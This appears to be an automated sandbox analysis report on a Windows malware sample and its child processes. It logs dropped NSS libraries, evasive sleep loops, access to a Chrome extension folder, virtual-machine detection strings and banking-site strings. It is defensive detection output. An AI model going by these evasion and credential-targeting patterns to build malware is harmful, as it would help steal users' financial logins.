Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Zachv5lCuu.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Zachv5lCuu.exe TID: 7520 Thread sleep count: 483 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7556 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep count: 856 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep time: -1712856s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3284 Thread sleep count: 379 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3284 Thread sleep time: -11370000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2044 Thread sleep time: -1440000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep count: 3018 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep time: -6039018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe TID: 2092 Thread sleep count: 383 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6CCBC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: explorti.exe, 0000000B.00000002.2552429167.00000000015A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Gu4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: global block list test formVMware20,11696492231
Source: 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: explorti.exe, explorti.exe, 0000000C.00000002.1604346648.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000011.00000002.2244960361.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: KKFHJJDH.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.000000000103C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.00000000011AC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.000000000103C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.00000000011AC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.000000000103C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.00000000011AC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: GHCGDAFCFH.exe, 00000009.00000002.1557327275.000000000086A000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000B.00000002.2550243453.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.1604346648.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000011.00000002.2244960361.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: KKFHJJDH.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
